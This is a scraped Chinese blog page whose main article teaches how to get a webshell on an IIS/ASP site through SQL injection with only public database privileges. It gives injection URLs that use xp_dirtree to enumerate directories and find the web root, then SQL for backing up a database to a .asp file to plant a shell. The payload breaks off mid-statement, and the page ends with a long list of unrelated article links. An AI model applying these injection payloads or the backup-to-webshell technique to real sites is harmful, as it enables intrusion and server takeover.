purpleforest

利用public权限获取webshell

通过SQL注入获取服务器的webshell，相关方法已经介绍很多了，但大多数方法都是基于SA权限的，而在实际情况中，通过注入更多的是获取到public权限，如何利用public权限就能获取webshell，本文给出了一种实施思路。

(1)、获取WEB路径
要往网站目录下写入Web Shell，那么首先就应该获取网站的根目录。

利用扩展存储过程xp_dirtree。通过它可以列出指定目录下所有子目录和文件。这个扩展存储过程有三个参数，第一个参数是路径，第二个参数是目录深度，第三个参数表示是否列出文件。如果第三个参数为0，那么只列出目录。最重要的一点是这个存储过程只需要PUBLIC权限便可以执行。
目前比较常见的方法是通过xp_dirtree把某个盘或某个目录下的子目录和文件列出来，插入到一个表中，并逐条读取表中的数据。通过切换不同的目录，达到浏览硬盘、搜索站点根目录的目的。

      它的利用过程类似如下，这里用http://www.xxx.com/index.asp?id=1为例来作为我们所要进行渗透的网站。首先建立一个临时表，把E盘下面的1级子目录和文件插入到表中：
http://www.xxx.com/index.asp?id=2;CREATE TABLE tmp([ID] int IDENTITY (1,1) NOT NULL,[name] [nvarchar] (300) NOT NULL,[depth] [int] NOT NULL,[isfile] [nvarchar] (50) NULL);insert into tmp exec master..xp_dirtree 'e:/',1,1
      然后，我们来获得tmp这个临时表中的第一条数据：
http://www.xxx.com/index.asp?id=1 and (select ame from tmp where id=1)>1
      从上面的返回结果我们可以看到临时表中的第一条记录了，我们逐步的递增ID值便可以把所有的数据找出来，从而知道我们所要找的文件的绝对路径。
      最后就是不要忘记把临时表删除，通过上面的方法，可以快速的找出网站的根目录所在。

(2)、写入Web shell

      目前PUBLIC权限用户写入SHELL的唯一途径可能就是备份了。这个方法是由Swan发现的。
      为什么通过备份数据库到硬盘的方法就能获得一个Web Shell？这是由IIS处理ASP文件的机制造成的。ASP后缀的文件由ASP.DLL负责解释执行的，ASP脚本以“<%”为开始标记，结束标记为“%>”。除此之外，其他所有字符不做任何的处理便直接返回给客户端。在能往数据库中插入任何数据的情况下，加入把数据库备份到磁盘并把后缀名设置为ASP，同时备份文件里面包含了我们精心构造的“<%******%>”，结果我们就可以得到一个shell了。
      不过根据Swan介绍，如果数据类型是文本格式的，如TEXT、NVARCHAR等，假设原始内容是“abc”，备份出来后，数据可能会被换成其他格式，如宽字符“a b c”。如果这样，精心构造的ASP SHELL就可能不会成功运行了。但数据类型是二进制格式，如IMAGE，就不会存在这个问题。但依然会存在其他可能存储的问题：
      ●    假如原始数据中本来即存在一些特殊字符，如“<%”之类，那么导出的ASP就无法正常执行了。
      ●    注入过程因失误注入一些无效的特殊字符，也会给ASP的正常运行带来麻烦。这样就可能要更换另一个数据库来继续注入、备份导出了。
      不过我们使用备份中的增量备份方式可以比较好的解决上面所讲的问题，而且这样还避免备份出来的ASP文件太大。假设这里有一个数据库hack，那么我们使用下面的SQL语句即可完成：
create table tmp(str image)
backup database hack to disk='e:/web/tmp.bak' with init
insert into tmp(str) values('

你可能感兴趣的:(应用安全)

深入理解跨站请求伪造（CSRF）：原理、危害与防御 weixin_47233946 信息安全 csrf 网络前端
引言跨站请求伪造（Cross-SiteRequestForgery,CSRF）是一种常见的Web安全漏洞，攻击者通过伪装用户身份执行非授权操作。根据OWASP（开放网络应用安全项目）的统计，CSRF曾多次入选十大Web安全威胁。本文将深入剖析CSRF的工作原理、潜在危害及防御策略。一、CSRF攻击原理1.1核心机制CSRF利用用户在目标网站（如银行网站）的已认证会话，诱骗其在不知情时发起恶意请求。
PHP安全编程实践系列（三）：安全会话管理与防护策略软考和人工智能学堂 php #php程序设计经验 php 安全开发语言
前言会话管理是Web应用安全的核心环节，不安全的会话实现可能导致用户账户被劫持、敏感数据泄露等严重后果。本文将深入探讨PHP中的会话安全机制，分析常见会话攻击手段，并提供全面的防护策略和实践方案。一、会话安全基础1.1PHP会话机制工作原理理论：PHP会话是通过会话ID（SessionID）在服务器和客户端之间维持状态的一种机制。关键流程包括：会话初始化：session_start()调用会话ID
深入剖析F5、DNS、LVS、Nginx、Tomcat：Java架构师的流量分发指南（一）呢喃coding 系统架构设计 java lvs nginx
深入剖析F5、DNS、LVS、Nginx、Tomcat：Java架构师的流量分发指南在Java架构设计中，流量分发是保障系统高性能、高可用的关键环节。F5、DNS、LVS、Nginx和Tomcat在流量分发处理中各自扮演着独特的角色，深入理解它们对于Java架构师来说至关重要。一、F5：企业级的应用交付利器（一）功能与特性F5是一款企业级的应用交付网络（ADN）设备，它集负载均衡、应用安全、SSL
iOS 出海 App 安全加固指南：无源码环境下的 IPA 加固与防破解方法
随着越来越多国内开发团队将iOSApp推向海外市场，如何在交付和分发环节保护应用安全成为出海过程中的重要议题。尤其是App进入多个海外应用商店或通过第三方渠道发行时，容易被当地黑产或竞争对手进行逆向分析，从而暴露内部API、核心业务流程等敏感信息。然而，很多出海App项目采用外包或快速孵化模式，交付阶段常常只拿到ipa成品文件而非完整源码。此时，如何在不改动源码的情况下对成品ipa完成安全加固，成
网络安全之XSS漏洞：原理、危害与防御实践 weixin_47233946 信息安全 web安全 xss 安全
引言跨站脚本攻击（Cross-SiteScripting,XSS）作为OWASP十大Web应用安全风险中的常客，是开发者必须掌握的核心攻防领域。不同于其他漏洞的直接性，XSS通过浏览器端的代码注入实现攻击传播，具有隐蔽性强、危害多样的特点。本文将深入剖析XSS漏洞的底层逻辑，探讨其实际影响，并提供系统化的防御方案。一、XSS攻击技术原理1.1浏览器执行上下文混淆XSS的根本成因在于开发者未能正确处
2025年网络安全研究生选择哪个方向有前景？～小羊没烦恼～网络安全黑客技术黑客 web安全安全开发语言网络学习
写在前面网络空间安全专业越来越受到国家政策的支持；而滴滴APP泄露个人隐私等事件，也使得大众的安全意识和安全需求前所未有的提高。在这样的环境下，越来越多的同学想要攻读网络安全专业，那么问题来了，网安研究生哪个方向更具有前景呢？网安方向介绍BAOYAN首先我们一起来了解一下网络空间安全专业有哪些方向，以及每个方向所需要的基础能力。网安大体可分为5个子方向，分别为密码学与应用安全、量子信息安全、数据安
Python爬虫实战：研究sanitize库相关技术 ylfhpy 爬虫项目实战 python 爬虫网络开发语言安全 sanitize
1.引言1.1研究背景与意义在当今数字化时代，互联网已成为人们获取信息、交流互动的重要平台。随着Web2.0技术的发展，用户生成内容(UGC)、社交媒体嵌入、第三方插件等功能极大丰富了网页的内容和交互性，但也带来了严峻的安全挑战。根据Web应用安全联盟(WAS)的统计数据，2025年全球范围内因网页安全漏洞导致的数据泄露事件超过15万起，造成的经济损失高达250亿美元。其中，跨站脚本攻击(XSS)
超详细【WEB应用安全测试指南--蓝队安全测试1】--超级详细的安全测试渗透性测试知识点--可直接上手进行对应的安全测试！！！！！！生活De°咸鱼安全专栏前端安全性测试 web安全安全威胁分析
一、概述1.1、编写目的结合公司的内部人员培养体系，本手册旨在为安全测试人员提供测试指导，安全测试人员通过查阅该指南可快速掌握Web应用安全测试，提高工作能力。1.2、使用范围本文适用于Web应用安全测试人员1.3、注意事项本文旨在为测试人员提供漏洞测试的基本思路，随着安全技术的发展，更多的新漏洞和测试方法将被爆出，安全测试人员应该具备不断学习新知识的能力。二、Web应用安全测试指南2.1、认证授
iOS 应用安全加固指南：通过 IPA 混淆与防破解技术实现全面防护 00后程序员张 http udp https websocket 网络安全网络协议 tcp/ip
在现代移动应用开发中，安全性已不再是一个可以忽视的领域。随着黑客技术的日益成熟以及用户对隐私保护的重视，开发者必须将安全性嵌入到应用的每一个开发环节中，而不仅仅是在开发的后期进行加固。尤其是对于那些涉及用户数据、支付信息等敏感内容的应用，确保应用的安全性是至关重要的。本文将介绍iOS应用开发中的安全实践，并结合具体的安全加固技术，如使用IpaGuard、Obfuscator-LLVM，从应用的设计
Spring框架中的过滤器、拦截器与Spring Security：深入比较与应用实践暮乘白帝过重山数据仓库 java 后端 spring 拦截器过滤器 Spring Security
一、引言在现代Java企业级应用开发中，Spring框架已经成为事实上的标准。随着应用安全性和复杂性的不断提高，开发者需要掌握多种请求处理和安全控制机制。本文将深入探讨Spring框架中的过滤器(Filter)、拦截器(Interceptor)和SpringSecurity这三种关键技术，分析它们的异同点、适用场景以及当前企业开发中的流行趋势。二、Spring框架概述Spring框架是一个轻量级的
iOS 安全加固实践：从源码加固到 IPA 混淆的全流程 2501_91590906 http udp https websocket 网络安全网络协议 tcp/ip
随着移动应用在全球范围内的普及，应用安全已经成为开发者面临的最大挑战之一。尤其是在涉及用户个人信息、财务数据、支付流程等敏感领域的应用，开发者不能忽视安全防护。在iOS应用开发过程中，很多开发者往往将安全加固放到后期，但事实上，在开发初期构建安全架构并逐步实施加固措施，是确保应用安全的关键所在。在本文中，我们将探讨如何在iOS应用开发的初期阶段构建安全架构，并结合后期的安全加固技术，如使用IpaG
iOS开发中的安全实践：如何通过Ipa混淆与加固确保应用安全 2501_91600747 http udp https websocket 网络安全网络协议 tcp/ip
随着移动应用技术的不断发展，开发者越来越重视应用的安全性，尤其是iOS应用。无论是面对大规模的数据泄露问题，还是在应用上线后避免被逆向破解，开发者们都需要采取一系列技术手段来保护应用。然而，很多开发者在应用开发过程中，往往忽视了安全加固的提前布局，导致在发布后才发现问题。如何在iOS应用的开发过程中进行有效的安全防护，成为了一个亟待解决的问题。本篇文章将探讨iOS开发中的安全实践，特别是如何通过混
Spring Security 技术原理与实战全景详解北漂老男人 Spring Security spring 数据库 java 学习方法
SpringSecurity技术原理与实战全景详解一、SpringSecurity简介SpringSecurity是Spring生态中专注于安全控制的核心框架，提供了认证、授权、攻击防护等全方位能力。它以声明式安全、可插拔架构、深度集成Spring著称，是Java企业应用安全的事实标准。二、主流程环节与设计思想2.1主流程环节概览SpringSecurity主流程可抽象为四大核心环节：认证（Aut
基于Cookie和Session的模拟登录爬取实战：突破登录认证的高级技术 Python×CATIA工业智造 pycharm 爬虫 python
引言在现代Web应用安全体系中，Cookie/Session认证机制构成了90%以上网站的登录基础。根据W3Techs统计，全球Top1000网站中，83%采用基于Cookie的会话管理机制。对于数据采集工程师而言，深入掌握Cookie和Session的工作原理及破解技术，已成为突破数据获取壁垒的核心竞争力。本文将从协议层原理出发，通过三大主流网站（知乎、京东、B站）的实战案例，系统讲解Cooki
RSAC 2024上发布和展示的100款网络安全创新产品和服务：超过半数与AI相关 lurenjia404 信安前沿资讯 web安全人工智能安全网络
RSAC被称为网络安全领域的创新方向标，期间发布和展示的来自全球的创新产品和服务，一定程度上代表着未来一年网络安全领域的技术和产品创新的方向。以大语言模型为代表的AI已经成为当下网络安全产品和服务创新的主题，在国外相关机构整理的102款RSAC2024上发布和展示的产品中，有54款应用了AI技术或围绕保护AI系统和应用安全。1、ArcticWolf发布风险评估工具安全运营公司ArcticWolf发
AI原生应用安全防护：如何实现端到端的安全保障？ SuperAGI2025 AI-native 安全 ai
AI原生应用安全防护：如何实现端到端的安全保障？关键词：AI原生应用、端到端安全、数据隐私、模型安全、访问控制、安全监控、威胁检测摘要：本文深入探讨AI原生应用的安全防护体系，从数据采集到模型部署的全生命周期安全保障。我们将分析AI应用面临的新型安全挑战，介绍端到端安全防护的核心技术，并通过实际案例展示如何构建健壮的AI安全防护体系。文章将帮助开发者和安全工程师理解AI应用安全的关键环节，并提供实
AI原生应用安全防护：从算法到架构的安全设计 AI天才研究院 AI大模型企业级应用开发实战 AI Agent 应用开发 AI-native 安全算法 ai
AI原生应用安全防护：从算法到架构的安全设计关键词：AI原生应用、安全防护、算法安全、架构安全、安全设计摘要：本文聚焦于AI原生应用的安全防护，从算法和架构两个关键层面展开深入探讨。详细介绍了AI原生应用安全防护的相关概念、核心算法原理、数学模型，通过实际项目案例展示了安全设计的具体实现过程。同时，分析了其实际应用场景、未来发展趋势与挑战，旨在为读者全面呈现AI原生应用安全防护从算法到架构的安全设
Spring Security 让后端系统的安全管理更高效 AI大模型应用实战 spring 安全 java ai
#SpringSecurity让后端系统的安全管理更高效>关键词：SpringSecurity、安全认证、权限控制、过滤器链、OAuth2、JWT、RBAC>摘要：本文深入探讨SpringSecurity如何通过其模块化架构和丰富的安全功能提升后端系统安全管理效率。从核心过滤器链机制到OAuth2集成，从基础表单登录到JWT令牌验证，结合算法原理、实战案例和数学建模，全方位解析现代Web应用安全防
深度解读云防火墙（WAF）：守护网络安全的智能卫士白山云北诗网络安全基础知识 web安全安全防火墙云防火墙 WAF web应用防火墙
在网络攻击手段日益复杂多样的当下，Web应用面临着SQL注入、跨站脚本攻击（XSS）等诸多威胁。传统防火墙在应对这些应用层攻击时存在局限性，云防火墙（WebApplicationFirewall，简称WAF）应运而生，成为保护Web应用安全的关键技术。本文将全面介绍云防火墙的相关知识，带你了解它如何为网络安全保驾护航。一、云防火墙（WAF）的定义与发展背景云防火墙（WAF）是一种专门针对Web应用
你工作中涉及的安全方面的测试有哪些怎么回答是曼曼呀安全
在面试或工作总结中，回答**“工作中涉及的安全测试”**时，可以结合具体场景、测试方法和工具，突出你的技术广度和深度。以下是结构化回答建议：---###**1.分类说明安全测试范围**####**(1)Web应用安全测试**-**OWASPTop10漏洞**：-**SQL注入**：使用`sqlmap`或手动构造恶意输入（如`'OR1=1--`）。-**XSS（跨站脚本）**：测试输入框是否过滤`a
Web安全深度解析：源码泄漏与未授权访问漏洞全指南 Bruce_xiaowei 笔记总结经验 web安全安全
Web安全深度解析：源码泄漏与未授权访问漏洞全指南引言：不可忽视的Web安全"暗礁"在Web应用安全领域，源码泄漏和未授权访问漏洞如同海面下的暗礁，看似不起眼却足以让整艘"企业安全之船"触礁沉没。本文将从攻击者视角深度剖析这些高危漏洞的形成机制、利用手法，并提供企业级防护方案，帮助开发者和安全工程师构建更坚固的防御体系。一、源码泄漏漏洞：企业数字资产的"后门"1.1版本控制系统的"致命疏忽"1.1
应对AppSec扩展难题：Burp Suite如何助力企业安全与合规双赢慧都小妮子安全网络运维 AppSec burp suit
随着企业应用组合的不断扩展，安全风险也在同步增加。每一个新的Web应用、API或微服务的上线，都可能为攻击者提供新的漏洞利用机会。与此同时，应用安全（AppSec）团队面临着在资源有限的情况下更快、更高效地完成任务的巨大压力。在2025年，扩展AppSec团队不仅仅是跟上发展的步伐，更是要走在风险前面。从管理庞大的应用组合到满足日益增长的合规要求，挑战可谓无处不在。为了帮助企业应对这些挑战，我们将
2025年渗透测试面试题总结-匿名[校招]攻防研究员(应用安全)（题目+回答）独行soc 2025年渗透测试面试指南面试职场和发展安全 linux web安全渗透测试
安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。目录匿名[校招]攻防研究员(应用安全)基础部分1.HTTP状态码2.HTTP请求方法及作用3.网络分层及协议OWASPTop101.XSS代码执行方式2.XSS常用标签及绕过3.HttpOnly的作用及绕过4.判断SQL注入存在5.无回显注入处理6.MySQL延时注入其他姿势
亚马逊云科技携手思科助力企业出海业务发展和AI应用安全 taibaili2023 AWS
亚马逊云科技携手思科助力企业出海业务发展和AI应用安全关键字:[亚马逊云科技，CiscoSecureX(CSC)，出海业务发展，连接性能力，应用可观测性，安全保护解决方案，国际标准法规]导读张铮先生在本次演讲中介绍了思科和亚马逊云科技如何携手帮助企业实现出海业务发展和AI应用安全。他首先阐述了思科的COSI模型，可以为企业出海业务提供连接性、可观测性、安全性和国际标准等全方位解决方案。随后，他重点
如何测试JWT的安全性：全面防御JSON Web Token的安全漏洞测试工程喵软件测试 json 前端网络安全功能测试接口测试 token
在当今的Web应用安全领域，JSONWebToken(JWT)已成为身份认证的主流方案，但OWASP统计显示，错误配置的JWT导致的安全事件占比高达42%。本文将系统性地介绍JWT安全测试的方法论，通过真实案例剖析典型漏洞，帮助我们构建全面的JWT安全防御体系。一、JWT基础安全测试1.算法验证测试测试方法：修改JWT头部的alg字段为none尝试删除签名部分使用不同算法重新签名典型案例：某政务系
AI原生应用安全指南：API编排的防护策略 AI智能应用 AI-native 安全网络 ai
AI原生应用安全指南：API编排的防护策略关键词：AI安全、API编排、防护策略、身份验证、数据加密、访问控制、威胁检测摘要：本文深入探讨AI原生应用中API编排的安全防护策略，从身份验证、数据加密到访问控制和威胁检测，提供全方位的安全解决方案。通过实际案例和代码示例，帮助开发者构建安全可靠的AI应用系统。背景介绍目的和范围在AI技术快速发展的今天，AI原生应用已成为各行各业的核心驱动力。这些应用
软件供应链安全 | 浅谈DAST、SAST、IAST、RASP、SCA等极创信息安全
以色列攻击黎巴嫩事件，特别是针对黎巴嫩真主党成员的通信设备爆炸事件，为软件供应链安全领域提供了深刻的启示。这次事件表明，通过供应链进行的攻击可以造成严重的物理损害和人员伤亡，这在以往的网络战中是较为罕见的。这种攻击方式的成功实施，凸显了在软硬件供应链中进行安全防护的重要性。DAST、SAST、IAST在软件安全领域，SAST（静态应用安全测试）、DAST（动态应用安全测试）和IAST（交互式应用安
PHP伪协议 terry990 php 开发语言
在探讨PHP安全时，了解及应用PHP伪协议是一项至关重要的技能。伪协议，也称作伪协议包装器，是PHP中用于访问不同类型数据流的一种特殊机制。它们允许开发者用统一的方式访问文件、网络资源、数据压缩等。尽管这极大地提升了开发效率，但同时也带来了安全隐患。本文旨在全面介绍PHP伪协议及其在提高PHP应用安全方面的实践。什么是PHP伪协议？伪协议并非真正的网络协议，而是PHP内建的一套协议，用于通过标准文
【移动应用安全】Android系统安全与保护机制 rockmelodies 移动安全安全 android 系统安全
Android系统安全与保护机制是一个多层次、多维度的防御体系，其安全架构与系统层级紧密耦合。以下是对各层级安全机制的扩展分析：Linux内核层（LinuxKernel）安全机制强制访问控制（MAC）通过SELinux（Security-EnhancedLinux）实现进程隔离和资源访问控制，定义严格的策略规则（如neverallow规则），防止提权攻击。内核模块签名所有内核模块需经过数字签名验证
安全架构设计步基架构设计安全架构
目录1安全需求分析2安全架构原则3安全架构方法系统架构完整实例_系统架构设计案例-CSDN博客1安全概述系统安全架构设计，主要包含：物理安全，网络安全，系统安全，数据安全，应用安全。完整性(Integrity)是指要防止系统的数据和资源在未经授权情况下被修改；机密性(Confidentiality)是指要防止系统的数据和资源在未授权的情况下被披露。安全架构需求分析主要包括以下几个方面：1.系统的安
scala的option和some 矮蛋蛋编程 scala
原文地址： http://blog.sina.com.cn/s/blog_68af3f090100qkt8.html 对于学习 Scala 的 Java™ 开发人员来说，对象是一个比较自然、简单的入口点。在本系列前几期文章中，我介绍了 Scala 中一些面向对象的编程方法，这些方法实际上与 Java 编程的区别不是很大。我还向您展示了 Scala 如何重新应用传统的面向对象概念，找到其缺点
NullPointerException Cb123456 android BaseAdapter
java.lang.NullPointerException: Attempt to invoke virtual method 'int android.view.View.getImportantForAccessibility()' on a null object reference 出现以上异常.然后就在baidu上
PHP使用文件和目录天子之骄 php文件和目录读取和写入 php验证文件 php锁定文件
PHP使用文件和目录 1.使用include()包含文件 (1)：使用include()从一个被包含文档返回一个值 (2)：在控制结构中使用include() include_once()函数需要一个包含文件的路径，此外，第一次调用它的情况和include()一样，如果在脚本执行中再次对同一个文件调用，那么这个文件不会再次包含。在php.ini文件中设置
SQL SELECT DISTINCT 语句何必如此 sql
SELECT DISTINCT 语句用于返回唯一不同的值。 SQL SELECT DISTINCT 语句在表中，一个列可能会包含多个重复值，有时您也许希望仅仅列出不同（distinct）的值。 DISTINCT 关键词用于返回唯一不同的值。 SQL SELECT DISTINCT 语法 SELECT DISTINCT column_name,column_name F
java冒泡排序 3213213333332132 java 冒泡排序
package com.algorithm; /** * @Description 冒泡 * @author FuJianyong * 2015-1-22上午09:58:39 */ public class MaoPao { public static void main(String[] args) { int[] mao = {17,50,26,18,9,10
struts2.18 +json,struts2-json-plugin-2.1.8.1.jar配置及问题！ 7454103 DAO spring Ajax json qq
struts2.18 出来有段时间了！（貌似是稳定版）闲时研究下下！貌似 sruts2 搭配 json 做 ajax 很吃香！实践了下下！不当之处请绕过！呵呵网上一大堆 struts2+json 不过大多的json 插件都是 jsonplugin.34.jar strut
struts2 数据标签说明 darkranger jsp bean struts servlet Scheme
数据标签主要用于提供各种数据访问相关的功能，包括显示一个Action里的属性，以及生成国际化输出等功能数据标签主要包括： action ：该标签用于在JSP页面中直接调用一个Action，通过指定executeResult参数，还可将该Action的处理结果包含到本页面来。 bean ：该标签用于创建一个javabean实例。如果指定了id属性，则可以将创建的javabean实例放入Sta
链表.简单的链表节点构建 aijuans 编程技巧
/*编程环境WIN-TC*/ #include "stdio.h" #include "conio.h" #define NODE(name, key_word, help) \ Node name[1]={{NULL, NULL, NULL, key_word, help}} typedef struct node { &nbs
tomcat下jndi的三种配置方式 avords tomcat
jndi(Java Naming and Directory Interface，Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。命名服务将名称和对象联系起来，使得我们可以用名称访问对象。目录服务是一种命名服务，在这种服务里，对象不但有名称，还有属性。 tomcat配置
关于敏捷的一些想法 houxinyou 敏捷
从网上看到这样一句话：“敏捷开发的最重要目标就是：满足用户多变的需求，说白了就是最大程度的让客户满意。” 感觉表达的不太清楚。感觉容易被人误解的地方主要在“用户多变的需求”上。第一种多变，实际上就是没有从根本上了解了用户的需求。用户的需求实际是稳定的，只是比较多，也比较混乱，用户一般只能了解自己的那一小部分，所以没有用户能清楚的表达出整体需求。而由于各种条件的，用户表达自己那一部分时也有
富养还是穷养，决定孩子的一生 bijian1013 教育人生
是什么决定孩子未来物质能否丰盛？为什么说寒门很难出贵子，三代才能出贵族？真的是父母必须有钱，才能大概率保证孩子未来富有吗？-----作者：@李雪爱与自由事实并非由物质决定，而是由心灵决定。一朋友富有而且修养气质很好，兄弟姐妹也都如此。她的童年时代，物质上大家都很贫乏，但妈妈总是保持生活中的美感，时不时给孩子们带回一些美好小玩意，从来不对孩子传递生活艰辛、金钱来之不易、要懂得珍惜
oracle 日期时间格式转化征客丶 oracle
oracle 系统时间有 SYSDATE 与 SYSTIMESTAMP； SYSDATE：不支持毫秒，取的是系统时间； SYSTIMESTAMP：支持毫秒，日期，时间是给时区转换的，秒和毫秒是取的系统的。日期转字符窜：一、不取毫秒： TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') 简要说明， YYYY 年 MM 月
【Scala六】分析Spark源代码总结的Scala语法四 bit1129 scala
1. apply语法 FileShuffleBlockManager中定义的类ShuffleFileGroup，定义： private class ShuffleFileGroup(val shuffleId: Int, val fileId: Int, val files: Array[File]) { ... def apply(bucketId
Erlang中有意思的bug bookjovi erlang
代码中常有一些很搞笑的bug，如下面的一行代码被调用两次（Erlang beam） commit f667e4a47b07b07ed035073b94d699ff5fe0ba9b Author: Jovi Zhang <[email protected]> Date: Fri Dec 2 16:19:22 2011 +0100 erts:
移位打印10进制数转16进制-2008-08-18 ljy325 java 基础
/** * Description 移位打印10进制的16进制形式 * Creation Date 15-08-2008 9:00 * @author 卢俊宇 * @version 1.0 * */ public class PrintHex { // 备选字符 static final char di
读《研磨设计模式》-代码笔记-组合模式 bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; abstract class Component { public abstract void printStruct(Str
利用cmd命令将.class文件打包成jar chenyu19891124 cmd jar
cmd命令打jar是如下实现：在运行里输入cmd，利用cmd命令进入到本地的工作盘符。(如我的是D盘下的文件有此路径 D:\workspace\prpall\WEB-INF\classes) 现在是想把D:\workspace\prpall\WEB-INF\classes路径下所有的文件打包成prpall.jar。然后继续如下操作： cd D: 回车 cd workspace/prpal
[原创]JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明 comsci eclipse 设计模式算法工作 swing
JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明 &nb
SecureCRT右键粘贴的设置 daizj secureCRT 右键粘贴
一般都习惯鼠标右键自动粘贴的功能，对于SecureCRT6.7.5 ，这个功能也已经是默认配置了。老版本的SecureCRT其实也有这个功能，只是不是默认设置，很多人不知道罢了。菜单： Options->Global Options ...->Terminal 右边有个Mouse的选项块。 Copy on Select Paste on Right/Middle
Linux 软链接和硬链接 dongwei_6688 linux
1.Linux链接概念Linux链接分两种，一种被称为硬链接（Hard Link），另一种被称为符号链接（Symbolic Link）。默认情况下，ln命令产生硬链接。【硬连接】硬连接指通过索引节点来进行连接。在Linux的文件系统中，保存在磁盘分区中的文件不管是什么类型都给它分配一个编号，称为索引节点号(Inode Index)。在Linux中，多个文件名指向同一索引节点是存在的。一般这种连
DIV底部自适应 dcj3sjt126com JavaScript
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
Centos6.5使用yum安装mysql——快速上手必备 dcj3sjt126com mysql
第1步、yum安装mysql [root@stonex ~]# yum -y install mysql-server 安装结果： Installed: mysql-server.x86_64 0:5.1.73-3.el6_5 &nb
如何调试JDK源码 frank1234 jdk
相信各位小伙伴们跟我一样，想通过JDK源码来学习Java，比如collections包，java.util.concurrent包。可惜的是sun提供的jdk并不能查看运行中的局部变量，需要重新编译一下rt.jar。下面是编译jdk的具体步骤： 1.把C:\java\jdk1.6.0_26\sr
Maximal Rectangle hcx2013 max
Given a 2D binary matrix filled with 0's and 1's, find the largest rectangle containing all ones and return its area. public class Solution { public int maximalRectangle(char[][] matrix)
Spring MVC测试框架详解——服务端测试 jinnianshilongnian spring mvc test
随着RESTful Web Service的流行，测试对外的Service是否满足期望也变的必要的。从Spring 3.2开始Spring了Spring Web测试框架，如果版本低于3.2，请使用spring-test-mvc项目（合并到spring3.2中了）。 Spring MVC测试框架提供了对服务器端和客户端（基于RestTemplate的客户端）提供了支持。 &nbs
Linux64位操作系统（CentOS6.6）上如何编译hadoop2.4.0 liyong0802 hadoop
一、准备编译软件 1.在官网下载jdk1.7、maven3.2.1、ant1.9.4，解压设置好环境变量就可以用。环境变量设置如下：（1）执行vim /etc/profile （2）在文件尾部加入: export JAVA_HOME=/home/spark/jdk1.7 export MAVEN_HOME=/ho
StatusBar 字体白色 pangyulei status
[[UIApplication sharedApplication] setStatusBarStyle:UIStatusBarStyleLightContent]; /*you'll also need to set UIViewControllerBasedStatusBarAppearance to NO in the plist file if you use this method
如何分析Java虚拟机死锁 sesame java thread oracle 虚拟机 jdbc
英文资料： Thread Dump and Concurrency Locks Thread dumps are very useful for diagnosing synchronization related problems such as deadlocks on object monitors. Ctrl-\ on Solaris/Linux or Ctrl-B
位运算简介及实用技巧（一）：基础篇 tw_wangzhengquan 位运算
http://www.matrix67.com/blog/archives/263 去年年底写的关于位运算的日志是这个Blog里少数大受欢迎的文章之一，很多人都希望我能不断完善那篇文章。后来我看到了不少其它的资料，学习到了更多关于位运算的知识，有了重新整理位运算技巧的想法。从今天起我就开始写这一系列位运算讲解文章，与其说是原来那篇文章的follow-up，不如说是一个r
jsearch的索引文件结构 yangshangchuan 搜索引擎 jsearch 全文检索信息检索 word分词
jsearch是一个高性能的全文检索工具包，基于倒排索引，基于java8，类似于lucene，但更轻量级。 jsearch的索引文件结构定义如下： 1、一个词的索引由=分割的三部分组成：第一部分是词第二部分是这个词在多少

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他